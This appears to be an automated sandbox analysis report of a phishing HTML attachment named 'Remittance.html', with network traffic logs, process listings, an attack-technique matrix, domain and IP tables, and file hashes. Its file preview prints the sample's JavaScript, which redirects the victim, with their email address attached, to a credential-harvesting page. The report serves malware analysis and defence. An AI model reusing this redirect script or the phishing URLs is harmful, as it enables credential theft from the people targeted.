        Source: global trafficHTTP traffic detected: GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://svrciviltechnologies.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fsbwa.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://svrciviltechnologies.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/bg.jpg HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://svrciviltechnologies.com/qr/main/main/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/favicon.ico HTTP/1.1Host: svrciviltechnologies.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://svrciviltechnologies.com/qr/main/main/main.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/arrow.JPG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: svrciviltechnologies.com
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/favicon.ico HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: svrciviltechnologies.com
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/ellipsis_white.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: svrciviltechnologies.com
        Source: global trafficHTTP traffic detected: GET /qr/main/main/main.php HTTP/1.1Host: svrciviltechnologies.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://svrciviltechnologies.com/qr/main/main/main.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=9cb51f99c0e1a0dd3a7d236137ff62c9
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/arrow.JPG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: svrciviltechnologies.comIf-Modified-Since: Fri, 29 Mar 2019 11:05:22 GMT
        Source: global trafficHTTP traffic detected: GET /qr/main/main/images/ellipsis_white.svg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: svrciviltechnologies.comIf-Modified-Since: Fri, 29 Mar 2019 11:05:22 GMT
        Source: Remittance.htmlString found in binary or memory: https://svrciviltechnologies.com/qr/main?e=?$
        Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+620; __Secure-ENID=6.SE=cJKCBuSaL1dV3R8z2Y2al7-m2m5bGA74lqbYYkqC3uy-NtZ1f6n_bCBr25tlnnjvdmLpGQ81ZKzP3Te5vVjpSQjYWCwvlOMApK7tmZNWcORu0p4wniPJGQfTslQNnpQWhG9qkwkEgy49-6UG3UQ1eiUyFolJZWLeUM1p4KvjM9E
        Source: unknownHTTPS traffic detected: 51.210.156.152:443 -> 192.168.2.3:49802 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 51.210.156.152:443 -> 192.168.2.3:49801 version: TLS 1.2

        System Summary

        barindex
        Source: Name includes: Remittance.htmlInitial sample: remit
        Source: classification engineClassification label: mal68.phis.winHTML@25/0@16/12
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Remittance.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1812,i,8274798147493147586,16206874965015421851,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1812,i,8274798147493147586,16206874965015421851,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationPath Interception1
        Process Injection
        2
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
        Non-Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
        Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
        Ingress Tool Transfer
        SIM Card SwapCarrier Billing Fraud
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        svrciviltechnologies.com0%VirustotalBrowse
        SourceDetectionScannerLabelLink
        https://svrciviltechnologies.com/qr/main?e=?$0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/?e=?Facilities@fsbwa.com0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/wp-content/uploads/2020/02/cropped-IMG-20200221-WA0039-removebg-preview-32x32.png0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/main/css/bootstrap.min.css0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main?e=?Facilities@fsbwa.com0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/main/action.php0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/main/images/arrow.JPG0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/main/images/ellipsis_white.svg0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/main/images/bg.jpg0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/favicon.ico0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/main/css/style.css0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/main/images/favicon.ico0%Avira URL Cloudsafe
        https://svrciviltechnologies.com/qr/main/main0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        stackpath.bootstrapcdn.com
        104.18.10.207
        truefalse
          high
          d26p066pn2w0s0.cloudfront.net
          18.66.30.94
          truefalse
            high
            accounts.google.com
            142.250.186.109
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                maxcdn.bootstrapcdn.com
                104.18.11.207
                truefalse
                  high
                  svrciviltechnologies.com
                  51.210.156.152
                  truefalseunknown
                  www.google.com
                  142.250.186.36
                  truefalse
                    high
                    clients.l.google.com
                    142.250.186.110
                    truefalse
                      high
                      clients2.google.com
                      unknown
                      unknownfalse
                        high
                        logo.clearbit.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://svrciviltechnologies.com/qr/main?e=?Facilities@fsbwa.comfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/recaptcha/api2/payload?p=06AEkXODD1_BdB7nrMCvTq-x5W-ERRA2trmCU7z6q9Ohx3TZJQz8IBQZNXRTpXomJG04OVLjYiuJG6KMWK7dDdEZVH3HfVlu5Y1MRSCWqvoYZyOTZAJPJBgVTzY1izWleMWQ1DdNyNVyR64t3bez5sDMUahfW9fGzMqb09hVueeaIuKLbXoTcDUNKEKtPgqJx3qSMQ9726-FY5QGW7dHeOBTjK3VDzNLKONA&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKb&id=2false
                            high
                            https://svrciviltechnologies.com/wp-content/uploads/2020/02/cropped-IMG-20200221-WA0039-removebg-preview-32x32.pngfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://svrciviltechnologies.com/qr/main/main/false
                              unknown
                              https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssfalse
                                high
                                https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.cssfalse
                                  high
                                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                    high
                                    https://svrciviltechnologies.com/qr/main/?e=?Facilities@fsbwa.comfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/recaptcha/api2/userverify?k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbfalse
                                      high
                                      https://svrciviltechnologies.com/qr/main/main/css/bootstrap.min.cssfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://svrciviltechnologies.com/qr/main/main/false
                                        unknown
                                        https://svrciviltechnologies.com/qr/main/main/action.phpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=Km9gKuG06He-isPsP6saG8cnfalse
                                          high
                                          https://www.google.com/recaptcha/api2/bframe?hl=en&v=Km9gKuG06He-isPsP6saG8cn&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbfalse
                                            high
                                            https://svrciviltechnologies.com/qr/main/main/images/arrow.JPGfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://svrciviltechnologies.com/qr/main/main/images/ellipsis_white.svgfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://svrciviltechnologies.com/qr/main/main/images/bg.jpgfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.google.com/recaptcha/api2/payload?p=06AEkXODDBsSDm1gZwjhI95pI5c4GaymKZ6r6Iw096p69astcTB3G4FXgfiittMYfFWq2EDjyd_PO35Xo8aQWy442eIPrtPQgRcERcH50_bB30vydG3nbQSKX-Ys3S96DPr2GptcX5QBPkLNhhGtPbu7tBPyA0sOZVjaV3W5rwHGPoNmQe61xiRIc3B4oq2HOuxGlnLHV9yMiv34I9yPlTP684ylRSb7h2wg&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbfalse
                                              high
                                              https://svrciviltechnologies.com/favicon.icofalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://svrciviltechnologies.com/qr/main/main/css/style.cssfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/recaptcha/api.jsfalse
                                                high
                                                https://www.google.com/recaptcha/api2/replaceimage?k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbfalse
                                                  high
                                                  https://svrciviltechnologies.com/qr/main/main/main.phptrue
                                                    unknown
                                                    https://svrciviltechnologies.com/qr/main/mainfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://logo.clearbit.com/fsbwa.comfalse
                                                      high
                                                      https://svrciviltechnologies.com/qr/main/main/main.phptrue
                                                        unknown
                                                        https://www.google.com/recaptcha/api2/bframe?hl=en&v=Km9gKuG06He-isPsP6saG8cn&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbfalse
                                                          high
                                                          https://www.google.com/recaptcha/api2/payload?p=06AEkXODD1_BdB7nrMCvTq-x5W-ERRA2trmCU7z6q9Ohx3TZJQz8IBQZNXRTpXomJG04OVLjYiuJG6KMWK7dDdEZVH3HfVlu5Y1MRSCWqvoYZyOTZAJPJBgVTzY1izWleMWQ1DdNyNVyR64t3bez5sDMUahfW9fGzMqb09hVueeaIuKLbXoTcDUNKEKtPgqJx3qSMQ9726-FY5QGW7dHeOBTjK3VDzNLKONA&k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbfalse
                                                            high
                                                            https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.jsfalse
                                                              high
                                                              https://www.google.com/recaptcha/api2/reload?k=6LevKEMjAAAAACrP5tlDxBo0GwS2VQ_w4JoD2PKbfalse
                                                                high
                                                                https://svrciviltechnologies.com/qr/main/main/images/favicon.icofalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.102&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                                                                  high
                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://svrciviltechnologies.com/qr/main?e=?$Remittance.htmlfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.18.10.207
                                                                  stackpath.bootstrapcdn.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  142.250.186.36
                                                                  www.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.18.11.207
                                                                  maxcdn.bootstrapcdn.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  142.250.186.109
                                                                  accounts.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  18.66.30.94
                                                                  d26p066pn2w0s0.cloudfront.netUnited States
                                                                  3MIT-GATEWAYSUSfalse
                                                                  239.255.255.250
                                                                  unknownReserved
                                                                  unknownunknownfalse
                                                                  142.250.186.110
                                                                  clients.l.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.186.100
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  51.210.156.152
                                                                  svrciviltechnologies.comFrance
                                                                  16276OVHFRfalse
                                                                  104.17.25.14
                                                                  cdnjs.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  IP
                                                                  192.168.2.1
                                                                  127.0.0.1
                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                  Analysis ID:756206
                                                                  Start date and time:2022-11-29 20:12:04 +01:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 3m 52s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:Remittance.html
                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                  Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                                                                  Number of analysed new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal68.phis.winHTML@25/0@16/12
                                                                  EGA Information:Failed
                                                                  HDC Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .html
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
                                                                  • TCP Packets have been reduced to 100
                                                                  • Excluded IPs from analysis (whitelisted): 142.250.185.227, 34.104.35.123, 142.250.74.195, 142.250.185.234, 142.250.185.74, 142.250.185.138, 172.217.16.202, 142.250.184.202, 142.250.186.170, 172.217.23.106, 142.250.181.234, 142.250.74.202, 142.250.186.74, 142.250.185.202, 142.250.184.234, 142.250.185.106, 172.217.18.106, 216.58.212.170, 142.250.186.106, 142.250.186.99, 142.250.186.67
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, login.live.com, slscr.update.microsoft.com, fonts.gstatic.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.gstatic.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                  No simulations
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:HTML document, ASCII text, with CRLF line terminators
                                                                  Entropy (8bit):5.197854157627124
                                                                  TrID:
                                                                    File name:Remittance.html
                                                                    File size:233
                                                                    MD5:2e6a26923a22e7c63a143e11227d4161
                                                                    SHA1:8f6857398dfe794b8853efc9e02d57b12a0b3da5
                                                                    SHA256:6ff75a1daf291abf72a3be2bb5034b0b0002ed90f7ea9c40ea84b66151fdae7e
                                                                    SHA512:2a5b70d18bf08f1fa879d908887be3979a10fa376ce1211355608fb53bc8a4a298ee8cf903d29f826e30f2a16a4f9ac2a28d8c2806c0b03d35addd4715c614d8
                                                                    SSDEEP:6:wAqJXIxY2FHLGVKIHpkRSmmHhX8Aha5V/YFmFb:1qZIxY2FHLGVTHJxHHhYJYsb
                                                                    TLSH:35D097D79F4280410A584B38C839720C867FAACA8488C280BE008430B304B85304A5D0
                                                                    File Content Preview:..<script type="text/JavaScript">.. var getEmail1blue93kmslxpcrypsoem375 = "Facilities@fsbwa.com";.. setTimeout(`location.href = "https://svrciviltechnologies.com/qr/main?e=?${getEmail1blue93kmslxpcrypsoem375}";`,0);..</script>
                                                                    Icon Hash:78d0a8cccc88c460
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 29, 2022 20:12:33.086762905 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.086852074 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.086971045 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.092322111 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.092401028 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.149174929 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.149266005 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.149377108 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.149662971 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.149698019 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.157419920 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.157919884 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.157973051 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.159832954 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.159992933 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.217818975 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.237140894 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.237196922 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.238073111 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.238173008 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.239106894 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.239176989 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.479337931 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.479412079 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.479798079 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.480190039 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.480230093 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.481317043 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.481370926 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.481611967 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.481626987 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.481673956 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.512403011 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.512505054 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.512548923 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.512739897 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.512814999 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.520035982 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.530101061 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.530306101 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.530359983 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.530601025 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.530689001 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.552190065 CET49694443192.168.2.3142.250.186.110
                                                                    Nov 29, 2022 20:12:33.552248001 CET44349694142.250.186.110192.168.2.3
                                                                    Nov 29, 2022 20:12:33.554096937 CET49693443192.168.2.3142.250.186.109
                                                                    Nov 29, 2022 20:12:33.554158926 CET44349693142.250.186.109192.168.2.3
                                                                    Nov 29, 2022 20:12:33.677503109 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.677580118 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.677678108 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.678047895 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.678081036 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.784603119 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.785001993 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.785056114 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.786698103 CET4434969551.210.156.152192.168.2.3
                                                                    Nov 29, 2022 20:12:33.786813974 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.790435076 CET49695443192.168.2.351.210.156.152
                                                                    Nov 29, 2022 20:12:33.790461063 CET4434969551.210.156.152192.168.2.3
